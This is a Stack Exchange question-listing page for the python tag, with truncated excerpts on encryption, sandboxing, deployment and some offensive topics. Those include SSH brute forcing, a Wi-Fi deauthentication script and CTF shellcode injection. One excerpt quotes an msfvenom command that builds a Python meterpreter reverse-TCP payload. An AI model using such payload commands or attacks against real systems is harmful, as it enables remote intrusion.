Skip to main content

Questions tagged [python]

High-level dynamic language developed by Guido van Rossum, particularly popular for server-side web programming and scripting.

Filter by
Sorted by
Tagged with
-1 votes
0 answers
25 views

Description: I am using OWASP Nettacker v0.4.0 to perform SSH brute force on a target system with IP 192.168.29.62. The ports 22 and 2222 are detected as running OpenSSH 10.2p1 Debian 2. Attempts to ...
Soni Jeevant's user avatar
2 votes
0 answers
210 views

Consider the following simple C program that asks the user for to input their user name and password in order to get access to some website. (The correct username is supposed to be "admin" ...
3nondatur's user avatar
  • 121
5 votes
2 answers
2k views

I'm not a security expert, so please excuse this question if it's silly, but I would really like an answer. I am using AES GCM to encrypt and would like to combine the randomly generated nonce with ...
doejoe's user avatar
  • 53
1 vote
1 answer
140 views

I am generating a Python payload using msfvenom with the following command: msfvenom -p python/meterpreter_reverse_tcp -f raw --platform python -e generic/none -a python LHOST=192.168.173.137 LPORT=...
Onyz's user avatar
  • 21
2 votes
2 answers
283 views

Before any of you answer, "HTTPS is built on top of TLS and everything is encrypted" I need to specify a very important note: I have FULL access to the client's machine (Windows) My ...
Advik's user avatar
  • 21
4 votes
2 answers
2k views

My intention is to transfer files between a computer and a cell phone in the same network. I have created a system consisting of two apps for this purpose (everyone should be able to use the apps): ...
12characters's user avatar
1 vote
0 answers
74 views

I have built a secure password management application using python. From my understanding I have completed the implementation in a secure manner. I would like to see if there are any flaws in my ...
Krishna Raju's user avatar
1 vote
0 answers
530 views

I'm trying to exploit the code posted by ir0nstone at this link. I followed any of the steps listed in the tutorial, but Address space layout randomization (ASLR) is not enabled on my machine. When I ...
xChineze's user avatar
0 votes
0 answers
686 views

I have the following code: if request.method == 'POST': exp = request.form['Expression'] for i in exp: if i in ascii_letters: return render_template('index.html', ...
oracle's user avatar
  • 1
1 vote
0 answers
195 views

I've been testing trying to deauthenticate my kindle from own wifi network. I created the following python script using scapy: from scapy.all import( RadioTap, Dot11, Dot11Deauth, ...
blondiefunk69's user avatar
13 votes
3 answers
5k views

I have a Rust-app executing Python-scripts using PyO3. The Python-scripts are uploaded by users, so I need to check for unsafe code before executing it. The scripts should only be able to do ...
O'Niel's user avatar
  • 3,540
2 votes
1 answer
318 views

I am trying to print the output of the 'HELP' command using the socket library in Python to communicate with an SMTP server, not the output of my connection to the SMTP server. That is how my Pythonic ...
youssef blt's user avatar
0 votes
1 answer
537 views

When I make a normal Python request to some site without any proxies, I get a 429 response, which is too many requests. However, when I open up Burpsuite proxy and add: import requests # Set up the ...
Lorde213423432e43434's user avatar
1 vote
1 answer
523 views

I'm wondering if it's possible to get the source code of some python program if the developer encrypted this source. We download a program in which the source is encrypted. But in order to translate ...
ushi YT-майнкрафт's user avatar
0 votes
1 answer
1k views

When looking for a way to shrink the attack surface for pypi package-typo-squatting, I came across a package called pip-audit on an article on the RedHat blog. I attempted to use it, but I'm quite ...
leeand00's user avatar
  • 1,601
0 votes
0 answers
454 views

Working on a CTF challenge and the coordinators hint suggests that one of the vectors to inject shellcode is via pathing. Looking at debugging prints does show the cwd and filename are passed onto the ...
TKC's user avatar
  • 1
0 votes
1 answer
151 views

I have developed a web service for customer. The web service is written in Python and running in Docker containers. It is managed by docker compose. The customer wants my web service to run on their ...
harry_tums's user avatar
3 votes
1 answer
1k views

I have a SaaS web application. One of my clients needs the app to be installed on his infrastructure (meaning physically on servers only they can access). The application stack is 2 docker images: one ...
Moen's user avatar
  • 31
2 votes
0 answers
185 views

I'm trying to offer a service to users that allows them to write Python via pyodide or R code via webR in their browser against my own data. I've been thinking of ways to go about this and I'm curious ...
S3AN556's user avatar
  • 21
1 vote
1 answer
137 views

The documentation for clkhash (https://clkhash.readthedocs.io/en/stable/tutorial_api.html) states that "knowledge of this secret is sufficient to reconstruct the PII information from a CLK". ...
jgeoirgnlsfnv's user avatar
0 votes
0 answers
1k views

I have found an arbitrary file upload vulnerability on a flask application that I was playing with that essentially allows me to append to any file (and create new ones) in the file system. The code ...
João Andreotti's user avatar
0 votes
1 answer
2k views

Using the requests library, I am trying to make request to a url. I've set the target to the specific url and checked, "And URL Is in Target Scope" in both Request interception rules and ...
Karan Bakshi's user avatar
0 votes
0 answers
291 views

I'm designing an app that receives sensitive data input from a user and that data needs to be saved securely in a database. As far as I understand it needs asymmetric encryption but since this app has ...
mic f's user avatar
  • 1
1 vote
1 answer
214 views

I am getting the occasional message from our Fortigate Fortinet firewall, indicating that there is a yaSSL.Buffer.Overflow attack. The log from the Fortinet is: Description: Subject: attack:MySQL....
Zak's user avatar
  • 111
1 vote
1 answer
143 views

I have a product I am making available to some users that runs via a Jupyter notebook. I deploy Jupyter inside of a docker container to an EC2 host. Each user gets an instance I'll send to them. For ...
achyrd's user avatar
  • 115

1
2 3 4 5
9